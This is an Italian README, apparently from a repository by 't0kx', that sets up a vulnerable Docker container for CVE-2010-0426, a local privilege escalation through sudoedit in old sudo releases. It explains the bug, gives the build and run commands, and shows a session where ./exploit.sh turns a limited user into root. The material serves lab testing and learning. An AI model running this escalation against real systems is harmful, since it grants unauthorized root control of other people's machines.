
Sudo 1.6.x <= 1.6.9p21 e 1.7.x <= 1.7.2p4 Escalation dei privilegi locale e contenitore vulnerabile
Sudo (su "do") consente a un amministratore di sistema di dare a determinati utenti (o gruppi di utenti) la possibilità di eseguire alcuni (o tutti) i comandi come root, registrando tutti i comandi e gli argomenti.
Per configurare un ambiente vulnerabile per il tuo test avrai bisogno di Docker installato e dovrai eseguire il seguente comando:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
E avvierà una shell interattiva con privilegi utente limitati.
Il bug è stato trovato in sudoedit, che non gestisce correttamente il comando 'sudoedit'; ciò consente a un utente malintenzionato di sostituire il vero comando sudoedit con un comando arbitrario.
Attaccanti locali potrebbero sfruttare questo problema per eseguire comandi arbitrari come utente 'root'. Sfruttamenti riusciti possono compromettere completamente un computer interessato.
Per sfruttare questo target esegui semplicemente:
./exploit.sh
Se stai usando questa immagine vulnerabile, puoi semplicemente eseguire:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
Questa falla è stata trovata da Slouching.
Questo o il programma precedente è SOLO a scopo didattico. Non usarlo senza permesso. Vale il solito disclaimer, in particolare il fatto che io (t0kx) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi provider Internet non si assume NESSUNA responsabilità per il contenuto o l'uso improprio di questi programmi o di loro derivati. Usando questi programmi accetti il fatto che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è responsabilità di t0kx.